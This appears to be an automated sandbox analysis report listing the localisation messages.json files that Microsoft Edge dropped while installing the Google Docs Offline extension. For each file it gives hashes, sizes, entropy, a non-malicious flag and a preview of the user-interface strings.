                                                                                                                                                                                                                                                                                                                            SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                            SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                            SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1031
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                            MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                            SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                            SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                            SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1613
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                            MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                            SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                            SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                            SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                            MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                            SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                            SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                            SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1425
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                            MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                            SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                            SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                            SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):961
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                            MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                            SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                            SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                            SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):959
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                            MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                            SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                            SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                            SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):968
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                            MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                            SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                            SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                            SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):838
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                            MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                            SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                            SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                            SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1305
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                            MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                            SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                            SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                            SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):911
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                            MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                            SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                            SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                            SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):939
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                            MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                            SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                            SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                            SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

